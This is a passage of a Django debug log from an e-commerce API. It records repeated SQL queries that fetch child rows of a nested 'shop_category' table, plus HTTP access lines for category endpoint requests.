"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:49:14,558 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:49:14,562 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:49:14,564 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:49:14,566 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:49:14,568 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:49:14,570 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:49:14,574 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:49:14,576 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:49:14,578 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 06:49:14,580 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:49:14,583 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:49:14,586 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:49:14,588 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:49:14,590 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:49:14,593 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:49:14,595 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:49:14,597 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:49:14,601 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:49:14,603 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 06:49:14,605 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:49:14,607 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:49:14,609 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:49:14,613 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:49:14,615 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:49:14,618 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:49:14,620 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:49:14,622 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:49:14,626 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:49:14,628 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:49:14,630 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:49:14,632 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:49:14,634 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:49:14,637 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:49:14,639 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:49:14,642 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:49:14,644 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:49:14,647 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:49:14,649 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:49:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 06:49:17,617 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:49:17,627 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:49:17,632 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 06:49:17,636 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:49:17,638 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:49:17,640 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:49:17,644 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 06:49:17,647 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [16/Dec/2019 06:49:17] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 06:49:17,649 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:49:17,652 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:49:17,654 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:49:17,658 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:49:17,660 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:49:17,663 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:49:17,667 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:49:17,670 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:49:17,673 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:49:17,675 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:49:17,678 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 06:49:17,680 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:49:17,682 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:49:17,686 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:49:17,688 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:49:17,690 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:49:17,693 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:49:17,695 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:49:17,697 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:49:17,701 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:49:17,703 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 